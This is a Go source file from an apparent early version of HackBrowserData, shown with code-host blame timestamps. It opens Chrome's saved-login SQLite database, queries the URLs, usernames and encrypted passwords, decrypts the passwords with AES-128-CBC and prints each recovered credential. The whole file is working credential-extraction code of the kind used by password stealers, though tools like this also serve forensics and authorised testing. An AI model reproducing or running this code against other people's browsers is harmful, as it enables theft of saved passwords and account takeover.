HackBrowserData/core/common/common.go

85 lines
1.5 KiB
Go
Raw Normal View History

2020-06-19 12:43:31 +00:00
package common
import (
"database/sql"
2020-06-20 15:20:01 +00:00
"fmt"
2020-06-19 12:43:31 +00:00
"hack-browser-data/log"
"hack-browser-data/utils"
_ "github.com/mattn/go-sqlite3"
)
const (
Chrome = "Chrome"
Safari = "Safari"
)
type (
BrowserData struct {
BrowserName string
LoginData []LoginData
}
LoginData struct {
UserName string
encryptPass []byte
Password string
LoginUrl string
}
History struct {
}
Cookie struct {
}
BookMark struct {
}
)
func ParseDB() (results []*LoginData) {
//datetime(visit_time / 1000000 + (strftime('%s', '1601-01-01')), 'unixepoch')
loginD := &LoginData{}
logins, err := sql.Open("sqlite3", utils.LoginData)
defer func() {
if err := logins.Close(); err != nil {
log.Println(err)
}
}()
if err != nil {
log.Println(err)
}
err = logins.Ping()
log.Println(err)
rows, err := logins.Query(`SELECT origin_url, username_value, password_value FROM logins`)
defer func() {
if err := rows.Close(); err != nil {
log.Println(err)
}
}()
log.Println(err)
for rows.Next() {
var (
url string
username string
pwd []byte
password string
)
err = rows.Scan(&url, &username, &pwd)
loginD = &LoginData{
UserName: username,
encryptPass: pwd,
LoginUrl: url,
}
if len(pwd) > 3 {
2020-06-20 15:20:01 +00:00
password, err = utils.Aes128CBCDecrypt(pwd[3:])
if err != nil {
panic(err)
}
2020-06-19 12:43:31 +00:00
}
loginD.Password = password
if err != nil {
log.Println(err)
}
2020-06-20 15:20:01 +00:00
fmt.Printf("%+v\n", loginD)
2020-06-19 12:43:31 +00:00
results = append(results, loginD)
}
return
}